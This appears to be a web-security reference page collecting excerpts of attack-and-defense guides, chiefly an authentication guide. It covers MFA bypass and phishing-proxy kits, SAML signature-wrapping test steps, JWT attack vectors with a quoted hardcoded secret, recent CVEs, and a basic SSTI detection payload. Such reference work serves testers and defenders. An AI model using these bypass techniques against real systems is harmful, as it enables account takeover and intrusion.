Web-Security

Comprehensive XSS Guide 🆕 Enhanced May 2, 2026 - Updated with 636 insights including 2026 XSS techniques, context-aware payload exploitation, and framework-specific attack vectors from automated security research analysis. A practitioner’s reference for Cross-Site Scripting — attack surface, context-aware payloads, filter/WAF/CSP bypass techniques, framework-specific vulnerabilities, real-world chains, and detection/prevention. Compiled from 636 research sources with automated content analysis and deduplication. Table of Contents Fundamentals Attack Surface & Entry Points Context-Aware Payloads Filter Bypass Techniques WAF Bypasses CSP Bypass Techniques Mutation XSS (mXSS) DOM Clobbering & Prototype Pollution Framework-Specific XSS AngularJS Sandbox Escapes postMessage & DOM XSS SVG, PDF & File Upload XSS Blind XSS Weaponized XSS Payloads Polyglots Real-World Exploitation Chains Tools & Automation Detection & Prevention Payload Quick Reference CVE Reference 1. Fundamentals XSS occurs when attacker-controlled input is rendered in a victim’s browser as executable code (JavaScript, or markup that leads to JavaScript execution). The victim’s browser runs the injected code with the origin’s privileges — same-origin access to cookies, DOM, API tokens, and session state. ...

Complete Web Vulnerability Prevention Hub Enhanced May 2026 with 2,000+ sources and real-time CVE intelligence - the only security guide collection with automated 2026 threat integration. 🎯 Core Web Vulnerabilities Injection Attacks XSS Prevention Guide - 636 sources (+116% expansion) 2026 bypass techniques, modern framework exploits, real-time CVE intelligence SQL Injection Guide - 113 sources (+223% expansion) ORM/NoSQL variants, database-specific exploits, enterprise platform CVEs Command Injection & RCE Guide - 628 sources ...

Comprehensive SSRF Guide 🆕 Enhanced May 2, 2026 - Updated with AI/MCP risks, CVE-2026-33626 analysis, and modern SSRF exploitation techniques from 686 automated security research sources. A practitioner’s reference for Server-Side Request Forgery — attack surface, exploitation techniques, bypass methods, real-world chains, and detection/prevention. Compiled from 686 research sources with automated content analysis and deduplication. Table of Contents Fundamentals Attack Surface & Entry Points IP Address Bypass Techniques URL Parsing & Protocol Tricks Cloud Metadata Exploitation Blind SSRF Techniques Protocol Smuggling Framework-Specific SSRF PDF Generator SSRF Real-World Exploitation Chains Tools & Automation MCP / AI Agent SSRF IPv6 & DNS Rebinding Bypass Patterns Detection & Prevention Payload Quick Reference 1. Fundamentals SSRF occurs when an attacker can make a server-side application send HTTP requests to an attacker-chosen destination. The server acts as a proxy, often with elevated network access (internal services, cloud metadata, localhost) and implicit trust (firewall bypass, authentication context). ...

Comprehensive SQL Injection Guide 🆕 Enhanced May 2, 2026 - Updated with 113 sources and 2026 SQLi techniques including ORM/NoSQL variants, database-specific exploit chains, and enterprise platform CVEs. A practitioner’s reference for SQL Injection — attack classes, exploitation techniques, database-specific payloads, WAF bypass methods, ORM/NoSQL variants, real-world CVEs, and detection/prevention. Compiled from 113 research sources including latest 2026 enterprise platform vulnerabilities. Table of Contents Fundamentals Attack Classes Entry Points & Injection Contexts DBMS Fingerprinting Authentication Bypass Union-Based Injection Error-Based Injection Boolean Blind Injection Time-Based Blind Injection Out-of-Band (OOB) Injection Second-Order SQL Injection Stacked Queries & Polyglots WAF Bypass Techniques Database-Specific Payloads ORM Injection NoSQL Injection SQLi to RCE Header, Cookie & JSON-Body Injection Constraint-Based Attacks Real-World CVEs Tools & Automation Detection & Prevention Payload Quick Reference 1. Fundamentals SQL Injection (SQLi) occurs when an attacker can influence the SQL statements that an application sends to its database. The vulnerability arises from the unsafe concatenation of untrusted input into a query string, allowing the attacker to break out of the intended data context and execute attacker-controlled SQL. SQLi has sat in the OWASP Top Ten since its inception and remains one of the highest-impact classes of web vulnerability despite decades of awareness. ...

Comprehensive CSRF Guide 🆕 Enhanced May 2, 2026 - Updated with 107 sources and bypass techniques including SameSite cookie exploitation, token validation bypasses, and enterprise platform vulnerabilities. A practitioner’s reference for Cross-Site Request Forgery — attack surface, exploitation techniques, SameSite and token bypasses, real-world chains, and detection/prevention. Compiled from 107 research sources including latest enterprise and financial platform vulnerabilities. Table of Contents Fundamentals Attack Surface & Preconditions Attack Delivery Techniques Content-Type & JSON CSRF SameSite Cookie Model SameSite Bypass Techniques CSRF Token Bypasses Referer / Origin Check Bypasses Method Override & Verb Tampering Login & Logout CSRF CORS Misconfiguration Chains Clickjacking Overlap Real-World Cases & CVEs Exploitation Chains Tools & Automation Detection & Testing Methodology Prevention & Defense in Depth Payload Quick Reference 1. Fundamentals Cross-Site Request Forgery (CSRF / XSRF / “sea-surf”) is an attack that tricks an authenticated user’s browser into submitting a state-changing request to a target application. The victim’s browser automatically attaches ambient credentials — cookies, HTTP Basic auth, client certificates, Kerberos tickets, IP-based authorization — so the target application cannot distinguish a forged request from a legitimate one. ...

Comprehensive IDOR Guide 🆕 Enhanced May 2, 2026 - Updated with 185 sources (+741% expansion) including modern IDOR enumeration patterns, authorization bypass techniques, and 2026 critical CVEs. A practitioner’s reference for Insecure Direct Object Reference (IDOR) and Broken Object Level Authorization (BOLA) — attack surface, enumeration patterns, bypass techniques, real-world writeups, detection workflow, and prevention. Compiled from 22 research sources. Table of Contents Fundamentals IDOR vs BOLA vs BFLA Attack Surface & Where Identifiers Live Horizontal vs Vertical Access Identifier Enumeration Patterns Parameter Tampering Techniques HTTP Method & Verb Tampering Content-Type & Format Bypasses Path, Version, and Endpoint Tricks Mass Assignment Overlap UUID & Unpredictable ID Defeats Second-Order and Blind IDOR GraphQL, WebSocket, and Non-REST Surfaces Real-World Writeups & CVEs Exploit Chains Detection Methodology with Autorize Tools & Automation Impact & Severity Mapping Prevention & Secure Design Testing Checklist Report Writing 1. Fundamentals IDOR occurs when an application uses user-supplied input to reference an internal object (database row, file, resource) and fails to verify whether the current user is authorized to access that specific object. The application trusts the identifier, not the identity. ...

Comprehensive RCE Guide 🆕 Enhanced May 2, 2026 - Updated with command injection CVEs, Expression Language (EL) techniques, and modern RCE exploitation methods from 628 automated security research sources. A practitioner’s reference for Remote Code Execution — vulnerability classes, exploitation primitives, language-specific chains, real-world CVEs, and detection/prevention. Compiled from 507 research sources including latest 2026 critical vulnerabilities. 🔥 Latest Update: May 2, 2026 - Enhanced with 2026 critical CVEs including CVE-2025-53652 (Jenkins), CVE-2026-32191 (Microsoft Bing), CVE-2026-34197 (ActiveMQ), and modern command injection + expression language techniques. ...

Comprehensive XXE Guide 🆕 Enhanced May 2, 2026 - Updated with 93 sources and XML security CVEs including out-of-band exfiltration techniques, parser exploitation, and enterprise platform vulnerabilities. A practitioner’s reference for XML External Entity injection — fundamentals, parser quirks, in-band and out-of-band exfiltration, parameter entity chains, file-format vectors, real-world CVEs, tooling, and hardening. Compiled from 93 research sources including latest enterprise platform vulnerabilities. Table of Contents Fundamentals Attack Surface & Entry Points Classic In-Band XXE Blind XXE via External DTD Error-Based XXE Parameter Entities & Local DTD Chains XXE → SSRF Pivoting XXE → File Read & Information Disclosure XXE → RCE Parser-Specific Behaviors XML File-Format Vectors WAF & Filter Bypasses Denial of Service Real-World CVEs & Chains Tooling Detection & Prevention Payload Quick Reference 1. Fundamentals XXE (XML External Entity) injection occurs when an XML parser processes attacker-controlled input with DTD (Document Type Definition) and external entity resolution enabled. The parser treats SYSTEM identifiers as URIs, fetching and substituting their content into the document — yielding file read, SSRF, blind exfiltration, DoS, and in some stacks RCE. ...

Comprehensive Insecure Deserialization Guide 🆕 Enhanced May 2, 2026 - Updated with 126 sources and serialization CVEs including gadget chain mechanics, language-specific exploits, and AI/ML platform vulnerabilities. A practitioner’s reference for insecure deserialization — language-specific attack surface, gadget chain mechanics, real-world CVE chains, tools, and detection/prevention. Compiled from 126 research sources including latest AI/ML platform vulnerabilities. Table of Contents Fundamentals Attack Surface & Entry Points Java Deserialization PHP Object Injection Python Pickle & ML Pipelines .NET Deserialization Ruby Marshal & YAML Node.js Deserialization YAML & JSON Format Attacks Gadget Chains Explained Real-World CVEs & Exploitation Chains Tools & Automation Detection & Static Analysis Prevention & Mitigation Signature & Gadget Quick Reference 1. Fundamentals Insecure deserialization occurs when an application reconstructs program objects from attacker-controlled data without sufficient validation. Serialization converts an in-memory object graph to a byte stream for storage or transit; deserialization reverses the process. The danger is that most native serialization formats are not just data — they are instructions for how to rebuild arbitrary objects, including which classes to instantiate and which methods (constructors, magic methods, callbacks) to run along the way. ...

Comprehensive GraphQL Security Guide 🆕 Enhanced May 2, 2026 - Updated with 78 sources and GraphQL CVEs including introspection attacks, authorization bypasses, and engine-specific exploitation techniques. A practitioner’s reference for attacking and defending GraphQL APIs — discovery, introspection, schema recovery, injection, authorization flaws, batching, DoS, subscriptions, CSRF/CSWSH, engine-specific quirks, and detection/prevention. Compiled from 31 research sources. Table of Contents Fundamentals Discovery & Fingerprinting Introspection Schema Recovery Without Introspection Query & Data Extraction Mutations & Mass Assignment Authorization Flaws (BOLA / BFLA / IDOR) Injection Through GraphQL Batching Attacks & Aliases Denial of Service CSRF & CSWSH Subscriptions & WebSockets Engine-Specific Notes (Apollo, Hasura, graphql-java, async-graphql, Mercurius) Notable CVEs & Real-World Chains Tooling Detection & Prevention Payload Quick Reference 1. Fundamentals GraphQL is a query language and server runtime for APIs, originally developed at Facebook and open-sourced in 2015. Instead of the multiple fixed endpoints of a REST API, a GraphQL service exposes a single endpoint that accepts typed queries and returns exactly the fields the client asks for. ...

Comprehensive API Security Guide 🆕 Enhanced May 2, 2026 - Updated with 490 sources (+900% expansion) including AI/LLM API vulnerabilities, modern authentication bypass techniques, and 2026 OWASP API security research. A practitioner’s reference for API security — attack surface, OWASP API Top 10 exploitation, authentication and authorization bypasses, GraphQL-specific attacks, rate limit evasion, API gateway hardening, open banking compliance, AI/MCP risks, real-world chains, and detection/prevention. Compiled from 490 research sources including latest 2026 AI/LLM vulnerabilities. ...

Comprehensive Authorization & Access Control Guide 🆕 Enhanced May 2, 2026 - Updated with privilege escalation CVEs including broken access control patterns, authorization bypass techniques, and OWASP A01 security analysis. A practitioner’s reference for Broken Access Control (OWASP A01) — the models, bug classes, bypass techniques, real-world chains, and detection/prevention patterns that matter in modern web and API testing. Enhanced from 107 research sources with 2026 privilege escalation CVEs. 🔥 Latest Update: May 2, 2026 - Enhanced with 2026 privilege escalation CVEs including CVE-2025-26244 (DeimosC2), CVE-2026-25253+ (OpenClaw chain), CVE-2025-53767 (Azure OpenAI) from automated security intelligence. ...

Comprehensive Python Security Guide 🆕 Enhanced May 2, 2026 - Updated with 8 critical CVEs including AI/ML framework vulnerabilities (Ollama, Hugging Face), supply chain security patterns, and Python 3.15 security features from automated 2026 threat intelligence analysis. A practitioner’s defensive reference for securing Python applications — dangerous APIs, deserialization pitfalls, framework-specific risks, supply chain attacks, AI/ML security threats, 2026 CVEs, advanced static analysis, and hardening patterns. Enhanced with cutting-edge threat intelligence and defensive techniques. ...

Comprehensive Authentication Guide 🆕 Enhanced May 2, 2026 - Updated with 2026 authentication CVEs including MFA bypass techniques, SSO vulnerabilities, and modern authentication protocol exploits. A practitioner’s reference for authentication security — protocols, mechanisms, vulnerabilities, exploitation techniques, and defense strategies. Covers traditional and modern authentication methods from enterprise to web applications. Compiled from 55 research sources. Table of Contents Fundamentals Password-Based Authentication Multi-Factor Authentication (MFA) OAuth 2.0 & OpenID Connect SAML & Enterprise SSO Modern Authentication (FIDO, WebAuthn, Passkeys) JWT Security Session Management Authentication Bypasses & Attacks Implementation Security Testing & Verification 1. Fundamentals Core Concepts Term Definition Security Impact Authentication (AuthN) Process of verifying identity claims Foundation of access control Digital Identity Unique representation in online context Basis for authorization decisions Identity Proofing Binding digital identity to real person KYC/compliance requirement Session Management Maintaining state across requests Critical for web application security Non-Human Identity (NHI) API keys, OAuth tokens, service accounts Path of least resistance for attackers — not bound by MFA or IP restrictions Authentication Factors Factor Type Examples Vulnerability Classes Something You Know Passwords, PINs, security questions Brute force, credential stuffing, social engineering Something You Have Hardware tokens, mobile apps, SMS SIM swapping, device theft, malware Something You Are Biometrics (fingerprint, face, voice) Spoofing, template theft, privacy concerns 2. Password-Based Authentication Password Strength Requirements Requirement NIST SP800-63B Standard Security Rationale Minimum Length 8 chars (with MFA), 14+ (without MFA) Increases brute force difficulty Maximum Length At least 64 characters Prevents artificial length limits Character Composition No mandatory complexity rules Avoid predictable patterns Dictionary Checking Block common passwords Prevent credential stuffing Common Password Vulnerabilities ATTACK VECTORS: ├── Credential Stuffing │ ├── Breach databases (HaveIBeenPwned) │ ├── Password reuse across sites │ └── Automated login attempts ├── Brute Force Attacks │ ├── Dictionary attacks │ ├── Rule-based mutations │ └── Hybrid attacks └── Password Reset Flows ├── Weak reset tokens ├── Token reuse vulnerabilities ├── Account enumeration └── Email interception for ATO (Post SMTP CVE-2025-24000 — Subscriber+ reads reset emails via broken REST API permissions) Secure Implementation Patterns Security Control Implementation Bypass Techniques Rate Limiting Progressive delays, account lockouts IP rotation, distributed attacks CAPTCHA Human verification challenges OCR bypass, solving services Password Hashing bcrypt, scrypt, Argon2 Rainbow tables (if salts weak) Breach Detection Monitor for credential exposure Private/corporate breaches REST API Auth Role-based permission callbacks (not just is_user_logged_in()) Subscriber-level access to admin endpoints 3. Multi-Factor Authentication (MFA) MFA Implementation Types Method Security Level User Experience Attack Vectors SMS OTP Low High friction SIM swapping, SS7 attacks TOTP Apps Medium Medium friction Device compromise, social engineering Push Notifications Medium-High Low friction MFA fatigue, device takeover Hardware Tokens High Medium friction Physical theft, supply chain Biometrics High Low friction Spoofing, template extraction Passwordless (FastPass/FIDO2) Very High Low friction Device compromise (Okta Terrify), endpoint proxy MFA Bypass Techniques BYPASS METHODS: ├── Social Engineering │ ├── MFA fatigue (push spam) │ ├── Vishing (voice phishing) │ └── SIM swapping ├── Technical Bypasses │ ├── Session fixation │ ├── MFA enrollment abuse │ ├── Backup code exploitation │ └── Race conditions ├── Adversary-in-the-Middle (AiTM) │ ├── Real-time phishing (Evilginx, Tycoon 2FA, Evilproxy, Mamba 2FA) │ ├── Session cookie interception and replay │ ├── Token replay │ └── Cloudflare Workers as transparent proxy (IOActive research) ├── Authentication Downgrade Attacks │ ├── JSON config manipulation — flip FIDO2 isDefault:false, push isDefault:true │ ├── CSS injection to hide passkey/FIDO2 UI options │ ├── Browser User-Agent spoofing (e.g., Safari on Windows) to trigger Entra ID fallback │ └── WebAuthn immediate mediation abuse for non-WebAuthn fallback steering ├── Conditional Access Policy (CAP) Bypasses │ ├── IP whitelisting bypass (VPN, Zscaler pivoting) │ ├── Geo-whitelisting bypass (VPN/location spoofing) │ ├── User-agent whitelisting bypass (custom UA strings) │ ├── Cloud tooling bypasses (ROADtools, BloodHound, AADInternals) │ └── Non-MFA hosts (legacy protocols, password reset portals) └── Machine-Based Attacks ├── Session token theft from memory (Cobalt Strike BOFs) ├── OTP keylogging / seed QR code theft ├── Okta Terrify — extract passwordless keys from compromised endpoint └── Stolen/unlocked devices Phishing-as-a-Service (PhaaS) Kits Kit Technique Detection Evasion Evilginx Open-source reverse proxy AiTM Default LetsEncrypt certs, 8-char URL paths, TLS fingerprint differs from target Tycoon 2FA PhaaS MFA bypass Dynamically obfuscated JS, phishing URL gating, IP/UA filtering Evilproxy PhaaS MFA bypass Templates for popular targets, bot detection Mamba 2FA PhaaS MFA bypass Anti-crawler delays, redirect to benign pages Cloudflare Workers Serverless transparent proxy (IOActive PoC) Zero forensic footprint, trusted CDN IPs, ephemeral execution Implementation Security Checklist Control Verification Common Mistakes Enrollment Security Verify primary auth before MFA setup Allow MFA changes without re-auth Backup Mechanisms Secure recovery codes Weak backup code generation Device Trust Risk-based authentication Unlimited device trust Rate Limiting Throttle MFA attempts No limits on failed attempts Eliminate Fallbacks No SMS/TOTP/push if FIDO2 deployed Mixed-mode policies allow downgrade Audit MFA Logs Detect new MFA device registration post-compromise Missing persistence detection 4. OAuth 2.0 & OpenID Connect OAuth 2.0 Flow Types Grant Type Use Case Security Considerations Authorization Code Server-side web apps Most secure, requires PKCE for SPAs Authorization Code + PKCE Public clients, SPAs Prevents authorization code injection Implicit Legacy SPAs Deprecated, token in URL fragment Client Credentials Service-to-service No user context, secure storage critical Device Code IoT/limited input devices Phishing risk during user approval Common OAuth Vulnerabilities Vulnerability Attack Vector Mitigation Authorization Code Interception Redirect URI manipulation Strict redirect validation State Parameter Missing CSRF attacks Cryptographically strong state Scope Escalation Privilege elevation Minimal scope principle Client Impersonation Stolen client credentials Client authentication OAuth Parameter Injection Inject arbitrary params (redirect_uri, scope) into auth flow Input sanitization (Okta auth0/nextjs-auth0 vuln) Implicit Flow Token Theft Access token in URL fragment, referer leakage Migrate to Authorization Code + PKCE CSRF via Missing State Attacker injects own authorization code into victim session State parameter enforcement Redirect URI Bypass Pattern-matching bypass (%2f%2f, %5c%5c, %3F, %23, port injection) Exact string match, no wildcards Credential Leakage via Referer Authorization code or token in Referer header to third-party content No third-party resources on callback pages Non-Human Identity Abuse Compromised OAuth tokens with overly broad scopes, null expiry refresh tokens Scope minimization, token rotation, vendor vetting Dynamic Client Registration SSRF (PortSwigger Research) SSRF ATTACK SURFACE VIA DYNAMIC REGISTRATION: ├── logo_uri — Server fetches logo image → SSRF on /authorize ├── jwks_uri — Server fetches JWK set for client_assertion validation → Blind SSRF ├── sector_identifier_uri — Server fetches redirect_uri list → SSRF on registration or authorization ├── request_uris — Whitelisted request_uri values → SSRF on /authorize via request_uri param │ (Even without dynamic registration, test request_uri on /authorize directly) └── Discovery: GET /.well-known/openid-configuration ├── registration_endpoint ├── request_uri_parameter_supported └── require_request_uri_registration CVE-2021-26715: SSRF via logo_uri in MITREid Connect ForgeRock OpenAM: SSRF via request_uri + redirect_uri Session Poisoning OAuth Security Implementation SECURITY CONTROLS: ├── Authorization Server │ ├── Strict redirect URI validation (exact match, no wildcards) │ ├── State parameter enforcement │ ├── PKCE for public clients │ ├── Short-lived authorization codes (single use) │ └── Disable Dynamic Client Registration if not needed ├── Resource Server │ ├── Token introspection │ ├── Scope validation │ ├── Audience verification │ └── Rate limiting ├── Client Application │ ├── Secure token storage (never in browser history/URL) │ ├── Token refresh handling with expiry │ ├── CSRF protection via state parameter │ ├── PKCE code_verifier/code_challenge │ └── TLS everywhere └── Non-Human Identity Governance ├── Monitor OAuth app registrations and consent grants ├── Audit token scopes vs actual usage ├── Enforce refresh token expiry (no null expiry) └── Vendor breach monitoring for third-party OAuth apps OAuth Pentesting Checklist (Authorization Code Grant) Test Case What to Check Impact Redirect URI Validation Change redirect_uri to attacker domain, test pattern bypasses Token/code theft State Parameter Remove or reuse state, test CSRF Account hijacking Code Reuse Replay authorization code Session hijacking Client Secret Exposure Check JS source, mobile app binaries Full OAuth flow compromise Scope Manipulation Request elevated scopes Privilege escalation Token in URL/History Check if access_token appears in URL fragment or browser history Token theft Referer Leakage Check callback pages for third-party resource loads Code/token leakage request_uri SSRF Supply attacker URL in request_uri param on /authorize Server-side request forgery 5. SAML & Enterprise SSO SAML Attack Surface Component Attack Vectors Security Controls Identity Provider (IdP) XML signature bypass, SAML injection Strong XML validation, signature verification Service Provider (SP) Assertion replay, audience restriction bypass, parser differential exploitation Strict temporal/audience checks, single XML parser SAML Assertions XXE, signature wrapping (XSW), attribute pollution Secure XML parsing, validation Metadata Metadata spoofing, certificate substitution Out-of-band verification FortiCloud SSO Crafted SAMLResponse to /remote/saml/login (CVE-2025-59718) Disable FortiCloud SSO until patched XML Signature Wrapping (XSW) Attacks — Deep Dive XSW ATTACK TAXONOMY: ├── Classic XSW │ ├── Move signed element, inject forged element in original location │ ├── Application processes forged data, signature validates against hidden original │ └── 8+ documented XSW variants in USENIX "On Breaking SAML" research ├── Parser Differential Exploits │ ├── ruby-saml: REXML + Nokogiri dual parser → different XPath results │ │ ├── CVE-2025-25291 / CVE-2025-25292 (ruby-saml < 1.18.0) │ │ ├── CVE-2024-45409 (ruby-saml signature bypass by ahacker1) │ │ └── Exploited in GitLab — sign in as any user with single valid signature │ ├── Attribute pollution — parser-specific attribute handling differences │ ├── REXML namespace confusion — without DTDs │ └── Void Canonicalization — novel technique (PortSwigger "The Fragile Lock") ├── Signature Exclusion / Comment Injection │ ├── Removing Signature element entirely │ ├── XML comment injection between signature elements │ └── Bypassing signature validation in libraries that don't enforce presence ├── Encrypted Assertion Bypass │ ├── GitHub Enterprise: signature extracted pre-decryption, inner assertion signature never validated │ │ ├── CVE-2024-4985 / CVE-2024-9487 │ │ └── Forge assertion inside encrypted envelope, only outer response signature checked │ └── samlify (Node.js): CVE-2025-47949 — Signature Wrapping with unsigned assertion extraction └── Improper Cryptographic Signature Verification ├── FortiGate FortiCloud SSO: CVE-2025-59718 / CVE-2025-59719 (CVSS 9.8) │ ├── SAML response signature not validated → forged SAMLResponse grants super_admin │ ├── Endpoint: POST /remote/saml/login │ ├── Actively exploited in the wild (Arctic Wolf, CISA KEV) │ └── Affects FortiOS, FortiProxy, FortiSwitchManager, FortiWeb └── CWE-347 pattern: system checks temporal claims but skips signature verification Real-World SAML CVEs CVE Product Vulnerability Impact CVE-2025-59718 FortiGate FortiCloud SSO Missing SAML signature validation Unauthenticated admin access CVE-2025-59719 FortiGate FortiCloud SSO Related bypass variant Unauthenticated admin access CVE-2025-25291 ruby-saml Parser differential (REXML/Nokogiri) Sign in as any user CVE-2025-25292 ruby-saml Parser differential (REXML/Nokogiri) Sign in as any user CVE-2024-45409 ruby-saml Signature bypass Authentication bypass CVE-2024-4985 GitHub Enterprise Encrypted assertion signature skip SAML SSO bypass CVE-2024-9487 GitHub Enterprise Follow-up encrypted assertion fix SAML SSO bypass CVE-2025-47949 samlify (Node.js) Signature Wrapping — unsigned assertion consumed Authentication bypass, user impersonation SAML Bug Hunting Methodology SAML TESTING WORKFLOW (using SAML Raider): ├── Setup │ ├── Install SAML Raider Burp extension │ ├── Import/clone X.509 certificates │ └── Capture SAML Response in proxy ├── Signature Wrapping Tests │ ├── Apply all 8 XSW variants from SAML Raider │ ├── Test with both signed Response and signed Assertion │ └── Test with cloned/self-signed certificates ├── Signature Removal │ ├── Remove Signature element entirely │ ├── Remove SignatureValue content │ └── Test if SP accepts unsigned assertions ├── Assertion Manipulation │ ├── Modify NameID to target user │ ├── Modify role/group attributes │ ├── Change audience restriction │ └── Alter temporal conditions (NotBefore/NotOnOrAfter) ├── XML-Level Attacks │ ├── XXE injection in SAML Response │ ├── XML comment injection in NameID │ ├── DTD-based attacks (if not blocked) │ └── Namespace confusion / attribute pollution └── Certificate Tests ├── Clone IdP certificate, self-sign assertion ├── Test if SP validates certificate chain └── Test if SP accepts any valid signature (not just from trusted IdP) 6. Modern Authentication (FIDO, WebAuthn, Passkeys) FIDO2/WebAuthn Architecture Component Function Security Properties Authenticator Private key storage, user verification Hardware-backed, phishing-resistant Client (Browser) Protocol handling, user interaction Sandboxed execution, origin binding Relying Party Credential management, verification Challenge-response validation FIDO Server Registration/authentication logic Cryptographic verification Passkey Types and Security Properties Type Storage Security Level Enterprise Suitability Device-Bound (Hardware Key) YubiKey, security key hardware Highest — non-exportable, hardware-backed Recommended for enterprise Synced (Multi-Device) iCloud Keychain, Google Password Manager Medium — inherits cloud account risk Consumer use only; not recommended for enterprise Synced Passkey Risks SYNCED PASSKEY ATTACK SURFACE: ├── Cloud Account Compromise │ ├── iCloud/Google account takeover → all synced passkeys compromised │ ├── Recovery workflow abuse → authorize new device with stolen credentials │ └── Personal cloud account on corporate device → passkeys leak to personal devices ├── Authentication Downgrade │ ├── AiTM proxy spoofs unsupported browser → Entra ID disables passkey option │ ├── User steered to SMS/OTP/push → captured by proxy │ └── WebAuthn immediate mediation abused to offer weak fallback ├── Browser Extension Attacks │ ├── webAuthenticationProxy API — intercept navigator.credentials.create()/get() │ ├── Content script DOM injection — manipulate passkey UI elements │ ├── DOM-based extension clickjacking — trigger autofill and exfiltration │ └── Malicious extension forces password fallback or re-registration └── Help Desk Social Engineering └── Recovery process = real control point attackers target WebAuthn Security Benefits Protection Traditional Auth WebAuthn Phishing Resistance Credentials reusable Origin binding prevents cross-site use Credential Theft Server breaches expose passwords Public key only stored server-side Replay Attacks Static credentials Cryptographic challenges with freshness Man-in-the-Middle Credentials interceptable Origin verification blocks proxy attacks Enterprise Passkey Deployment Guidance Area Recommendation Rationale Credential Type Device-bound only (hardware security keys) Non-exportable, hardware-backed, inventoriable Fallback Methods Eliminate all (SMS, TOTP, push, email) Weakest method = real security level Browser Extensions Allowlist only; block webAuthenticationProxy permission Prevent WebAuthn API interception Attestation Capture device model and assurance at registration Reject unrecognized authenticators Recovery Hardware key-based reproofing only No help desk/email-based recovery Session Binding Tie sessions to device context, not just initial auth Prevent portable session cookie theft Cloudflare FIDO2 Deployment Case Study CLOUDFLARE ROLLOUT TIMELINE: ├── 2018: Distributed YubiKey 5 Nano + YubiKey 5 NFC to all employees ├── 2020: Selective enforcement via Cloudflare Access (Zero Trust proxy) │ ├── OAuth2 integration with IdP, enforce "swk" (security key) AMR value │ └── Incremental rollout — one service at a time ├── Feb 2021: Full enforcement — disabled all TOTP/SMS │ ├── Triggered by social engineering phone calls to employees │ └── Offline recovery process for lost keys (distribute 2 keys per employee) ├── SSH via Cloudflare Tunnel: cloudflared + Access policies enforce FIDO2 for SSH └── Result: Zero successful phishing attacks post-deployment 7. JWT Security JWT Attack Vectors Vulnerability Technique Real-World Example Algorithm Confusion (alg=none) Set JWT header alg to “none”, remove signature Classic JWT bypass Missing Signature Verification Server decodes JWT but never checks signature Convoy KVM CVE-2026-33746 (CVSS 9.8) — JWTService::decode() missing SignedWith constraint JWE Encryption Mix-Up Encrypt unsigned PlainJWT with server’s RSA public key; server decrypts and accepts without signature check pac4j-jwt CVE-2026-29000 — forge admin tokens with public key only Hardcoded JWT Secrets Static/weak signing secrets Zendesk Android SDK — hardcoded secret “987sdasdlkjlakdjf” + sequential IDs → mass ATO Weak Cookie Auth Tags Brute-forceable authentication tags on session cookies Auth0-PHP SDK CVE-2025-47275 (CVSS 9.1) — brute force CookieStore auth tags Default Signing Keys Predictable or default JWT signing keys Apache StreamPipes CVE-2025-47411 JWT Security Checklist Control Implementation Common Mistakes Algorithm Enforcement Whitelist allowed algorithms server-side Accept alg from JWT header without validation Signature Verification Always verify before trusting claims Check only expiration (Convoy pattern) Key Management Rotate secrets, use asymmetric keys Hardcoded secrets, public key in source Claim Validation Verify iss, aud, exp, nbf, iat Trust user-controlled claims JWE Handling Enforce inner JWT must be signed, not PlainJWT Accept PlainJWT inside JWE (pac4j-jwt pattern) 8. Session Management Session Security Requirements Property Implementation Attack Prevention Uniqueness Cryptographically random IDs Session prediction Unpredictability High entropy (128+ bits) Brute force guessing Secure Transmission HTTPS only, Secure flag Network interception Proper Expiration Absolute/idle timeouts Session hijacking Device Binding Tie session to device context/posture Portable cookie theft via AiTM Session Attack Vectors SESSION ATTACKS: ├── Session Hijacking │ ├── Network sniffing │ ├── Cross-site scripting (XSS) │ ├── Malware/browser compromise │ └── AiTM reverse proxy cookie interception (Evilginx, Tycoon 2FA) ├── Session Fixation │ ├── Pre-authentication session reuse │ ├── URL-based session ID │ └── Missing session regeneration ├── Session Timing │ ├── Concurrent sessions │ ├── Logout handling │ └── Session timeout bypass └── Session Token Portability ├── Stolen session cookies replayed from different device/IP ├── Impossible travel detection evasion └── Post-compromise MFA device registration for persistence 9. Authentication Bypasses & Attacks Business Logic Bypasses Bypass Type Technique Testing Approach Direct Access URL manipulation Forced browsing, parameter tampering State Manipulation Session/workflow bypass Multi-step process analysis Role Confusion Privilege escalation Horizontal/vertical privesc testing Reset Abuse Account takeover Password reset flow analysis Middleware-Only Auth Next.js CVE-2025-29927 — x-middleware-subrequest header bypass Verify auth in page routes/API routes, not just middleware Critical Authentication CVEs (2026) Recent authentication vulnerabilities demonstrate evolving attack patterns across enterprise systems and cloud services: ...

Comprehensive JWT Security Guide 🆕 Enhanced May 2, 2026 - Updated with 138 sources and JWT security analysis including algorithm confusion attacks, signature bypasses, and modern token exploitation techniques. A practitioner’s reference for JSON Web Token security – vulnerabilities, exploitation techniques, attack vectors, implementation flaws, and defense strategies. Covers algorithm confusion, signature bypass, header injection, key confusion, library-specific issues, cryptographic attacks, attack chaining, and secure implementation patterns. Compiled from 138 research sources including latest library vulnerabilities. ...

Comprehensive SSTI Guide 🆕 Enhanced May 2, 2026 - Updated with 88 sources and template injection CVEs including engine-specific exploits, AI/ML platform vulnerabilities, and RCE payload development techniques. A practitioner’s reference for Server-Side Template Injection — template engine vulnerabilities, exploitation techniques, payload development, framework-specific attacks, and defense strategies. Covers detection methodologies, engine-specific exploitation, and secure templating practices. Compiled from 88 research sources including latest AI/ML platform vulnerabilities. Table of Contents Fundamentals Detection & Identification Template Engine Exploitation Framework-Specific Attacks Payload Development Advanced Exploitation Bypass Techniques Testing Methodology Secure Implementation Detection & Prevention CVE Reference 1. Fundamentals SSTI Attack Surface Template Context Risk Level Common Locations User Input Rendering Critical Email templates, reports, dynamic pages Configuration Files High Template-based configs, dynamic routing Error Messages Medium Custom error pages, debug output Log Messages Low Log formatting, audit trails Email Workflow Templates Critical Notification templates, marketing emails (Shopify Return Magic, Fides) Recipe/CMS Content Fields Critical User-editable content rendered by template engines (Tandoor Recipes, Alfresco) JMS/Message Headers High Apache Camel template override headers (CamelFreemarkerTemplate, CamelVelocityTemplate) Template Engine Landscape Engine Language Popularity Exploitation Difficulty Jinja2 Python Very High Medium Twig PHP High Medium FreeMarker Java High High Velocity Java Medium High Thymeleaf Java Medium Medium Smarty PHP Medium Low Mako Python Low Low Handlebars Node.js Very High Medium Pug (Jade) Node.js High Medium Go html/template Go Medium High (context-dependent) Go text/template Go Medium Medium Jelly Java Medium (ServiceNow) Medium MVEL Java Low Low Mustache Multi-language Medium High (logicless by design) Tornado Python Medium Medium 2. Detection & Identification Detection Methodology SSTI DETECTION FLOW: 1. Identify template injection points 2. Test mathematical expressions 3. Analyze error messages 4. Determine template engine 5. Craft engine-specific payloads 6. Test blind detection via time-based or OOB channels Basic Detection Payloads Test Case Payload Expected Result Mathematical ${7*7} 49 